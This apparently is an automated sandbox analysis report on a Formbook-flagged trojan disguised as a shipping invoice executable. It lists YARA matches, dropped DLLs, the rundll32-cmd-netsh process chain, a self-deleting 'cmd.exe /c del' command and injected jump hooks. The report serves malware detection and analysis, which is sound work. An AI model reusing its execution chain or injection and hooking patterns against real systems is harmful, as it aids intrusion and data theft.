Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037499D0 NtCreateProcessEx,	9_2_037499D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374B040 NtSuspendThread,	9_2_0374B040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749820 NtEnumerateKey,	9_2_03749820
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037498F0 NtReadVirtualMemory,	9_2_037498F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037498A0 NtWriteVirtualMemory,	9_2_037498A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374A770 NtOpenThread,	9_2_0374A770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749770 NtSetInformationFile,	9_2_03749770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749760 NtOpenProcess,	9_2_03749760
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749730 NtQueryVirtualMemory,	9_2_03749730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374A710 NtOpenProcessToken,	9_2_0374A710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037497A0 NtUnmapViewOfSection,	9_2_037497A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749670 NtQueryInformationProcess,	9_2_03749670
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749660 NtAllocateVirtualMemory,	9_2_03749660
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749650 NtQueryValueKey,	9_2_03749650
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749610 NtEnumerateValueKey,	9_2_03749610
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749560 NtWriteFile,	9_2_03749560
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374AD30 NtSetContextThread,	9_2_0374AD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03749520 NtWaitForSingleObject,	9_2_03749520
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037495F0 NtQueryInformationFile,	9_2_037495F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F782B0 NtClose,	9_2_02F782B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F78230 NtReadFile,	9_2_02F78230
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F78180 NtCreateFile,	9_2_02F78180
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F782DA NtClose,	9_2_02F782DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F782AC NtClose,	9_2_02F782AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7817A NtCreateFile,	9_2_02F7817A

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004033A9

Detected potential crypto function

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_00406943	0_2_00406943
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Code function: 0_2_0040711A	0_2_0040711A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10001BB0	1_2_10001BB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10004700	1_2_10004700
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10006325	1_2_10006325
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041CB17	2_2_0041CB17
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041CB1A	2_2_0041CB1A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B466	2_2_0041B466
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00408C2B	2_2_00408C2B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00408C30	2_2_00408C30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B30D20	2_2_04B30D20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C01D55	2_2_04C01D55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B56E30	2_2_04B56E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B090	2_2_04B4B090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1002	2_2_04BF1002
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3F900	2_2_04B3F900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6EBB0	2_2_04B6EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AB40	9_2_0372AB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037ACB4F	9_2_037ACB4F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D2B28	9_2_037D2B28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C03DA	9_2_037C03DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373ABD8	9_2_0373ABD8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CDBD2	9_2_037CDBD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373EBB0	9_2_0373EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BFA2B	9_2_037BFA2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D22AE	9_2_037D22AE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370F900	9_2_0370F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037DE824	9_2_037DE824
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1002	9_2_037C1002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D28EC	9_2_037D28EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D20A8	9_2_037D20A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B090	9_2_0371B090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D1FF1	9_2_037D1FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037DDFCE	9_2_037DDFCE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03726E30	9_2_03726E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CD616	9_2_037CD616
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D2EF7	9_2_037D2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D1D55	9_2_037D1D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03700D20	9_2_03700D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D2D07	9_2_037D2D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371D5E0	9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D25DD	9_2_037D25DD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CD466	9_2_037CD466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371841F	9_2_0371841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7CB17	9_2_02F7CB17
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7CB1A	9_2_02F7CB1A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F62FB0	9_2_02F62FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B466	9_2_02F7B466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F68C30	9_2_02F68C30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F68C2B	9_2_02F68C2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F62D90	9_2_02F62D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F62D87	9_2_02F62D87

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\netsh.exe

Code function: String function: 0370B150 appears 136 times

PE file contains strange resources

Source: Shipping INVOICE-BL Shipment..exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Shipping INVOICE-BL Shipment..exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DevCfgUI.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

PE file does not import any functions

Source: DevCfgUI.dll.0.dr

Static PE information: No import functions for PE file found

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: sfc.dll

Jump to behavior

Yara signature match

Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/27@11/6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_100019C0 Cremaster,CertOpenSystemStoreA,EqualSid,FlushFileBuffers,GetWindowThreadProcessId,ReleaseSemaphore,LoadBitmapA,ScrollDC,SetScrollPos,HeapDestroy,ReadFile,

1_2_100019C0

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

0_2_004033A9

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Code function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404686

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,

0_2_00402138

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File created: C:\Users\user\AppData\Roaming\pkgs

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File created: C:\Users\user\AppData\Local\Temp\nse53A6.tmp

Jump to behavior

Source: Shipping INVOICE-BL Shipment..exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises

Source: Shipping INVOICE-BL Shipment..exe	Virustotal: Detection: 27%
Source: Shipping INVOICE-BL Shipment..exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File read: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Shipping INVOICE-BL Shipment..exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: vjscsvr.pdb source: nse53A7.tmp.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\rcxdtiui.pdb source: rcxditui.dll.0.dr
Source:	Binary string: netsh.pdb source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
Source:	Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb$ source: MSBuildFramework.dll.0.dr
Source:	Binary string: netsh.pdbGCTL source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, netsh.exe, 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp
Source:	Binary string: cmd.pdbUGP source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, netsh.exe
Source:	Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb source: MSBuildFramework.dll.0.dr
Source:	Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdbQ" source: nse53A7.tmp.0.dr
Source:	Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\dbsvcui.pdb source: nse53A7.tmp.0.dr
Source:	Binary string: cmd.pdb source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
Source:	Binary string: MakeCert.pdb source: makecert.exe.0.dr
Source:	Binary string: guidgen.pdb source: guidgen.exe.0.dr
Source:	Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdb source: nse53A7.tmp.0.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

1_2_1000734B

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_100046E5 push ecx; ret	1_2_100046F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041C952 push es; ret	2_2_0041C954
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B375 push eax; ret	2_2_0041B3C8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B3C2 push eax; ret	2_2_0041B3C8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B3CB push eax; ret	2_2_0041B432
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00409412 push ss; ret	2_2_00409415
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B42C push eax; ret	2_2_0041B432
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00414D93 push 5C0B9774h; iretd	2_2_00414DBA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00414EE9 push ebp; ret	2_2_00414F0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B8D0D1 push ecx; ret	2_2_04B8D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0375D0D1 push ecx; ret	9_2_0375D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B3C2 push eax; ret	9_2_02F7B3C8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B3CB push eax; ret	9_2_02F7B432
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B375 push eax; ret	9_2_02F7B3C8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7C952 push es; ret	9_2_02F7C954
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F74EE9 push ebp; ret	9_2_02F74F0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B42C push eax; ret	9_2_02F7B432
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F69412 push ss; ret	9_2_02F69415
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F74D93 push 5C0B9774h; iretd	9_2_02F74DBA

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\Prehnite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77165050 value: E9 EB 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 771650F0 value: E9 5B 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77165180 value: E9 9B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77165190 value: E9 CB 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 771651A0 value: E9 4B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 7717FEE0 value: E9 9B FF FF FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 771133C0 value: E9 FB 6F 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77114760 value: E9 2B 6B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 770D6590 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 770DB510 value: E9 2B 53 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 770FC490 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 7711EE00 value: E9 E1 52 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 7711EFD0 value: E9 26 5B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00	Jump to behavior
